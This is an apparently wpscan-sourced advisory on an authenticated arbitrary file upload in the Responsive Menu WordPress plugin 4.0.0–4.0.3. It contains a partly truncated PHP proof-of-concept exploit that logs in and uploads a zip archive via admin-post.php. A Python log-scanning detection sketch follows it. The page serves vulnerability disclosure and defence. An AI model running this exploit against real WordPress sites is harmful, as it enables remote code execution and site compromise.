wpvulndb | Chloe Chamberland | WPVDB-ID:066BA5D4-4AAA-4462-B106-500C1F291C37
Feb 10, 2021 - 12:00 a.m.

Responsive Menu 4.0.0 - 4.0.3 - Authenticated Arbitrary File Upload

wpscan.com

“A subscriber could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/themes/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site.”

PoC

$wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]);
$output = curl_exec($ch);
curl_close($ch);

// Update Settings
$ch = curl_init();
$cFile = curl_file_create( realpath( $upfile ) );
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-post.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'rmp_upload_theme_file',
    'file' => $cFile,
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
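Detection sketch for the behaviour described above, added here as an example (not part of the original advisory or the plugin's code): it scans web access logs for requests to script files under /rmp-menu/themes/ and notes whether the same client earlier POSTed to /wp-admin/admin-post.php. The log format (Combined Log Format), the extension list, the function name and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_ENDPOINT = "/wp-admin/admin-post.php"  # endpoint the PoC posts the archive to
THEMES_MARKER = "/rmp-menu/themes/"           # extraction directory named in the advisory
# Assumption: extensions the web server hands to PHP; "(/|$)" also catches PATH_INFO.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.I)


def analyze(lines):
    """Flag script requests under the themes directory and note whether the
    same client IP POSTed to admin-post.php earlier in the log."""
    posted, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop the query, decode %xx
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            posted.add(ip)
        elif THEMES_MARKER in path and SCRIPT_EXT.search(path):
            findings.append({"ip": ip, "time": ts, "path": path,
                             "status": int(status),
                             "prior_upload_post": ip in posted})
    return findings


# Constructed sample log: IPs, file names and the URL prefix are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Feb/2021:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl"',
    '203.0.113.7 - - [10/Feb/2021:10:00:02 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 0 "-" "curl"',
    '203.0.113.7 - - [10/Feb/2021:10:00:05 +0000] "GET /wp-content/uploads/rmp-menu/themes/demo/a.php?x=1 HTTP/1.1" 200 12 "-" "curl"',
    '198.51.100.9 - - [10/Feb/2021:10:01:00 +0000] "GET /wp-content/uploads/rmp-menu/themes/demo/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Feb/2021:10:02:00 +0000] "GET /wp-content/uploads/rmp-menu/themes/demo/%61.PHP/info HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The upload action name travels in the POST body and does not appear in access logs, so prior_upload_post is only a correlation hint; any request for a script file under the themes directory deserves a look at the file on disk.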
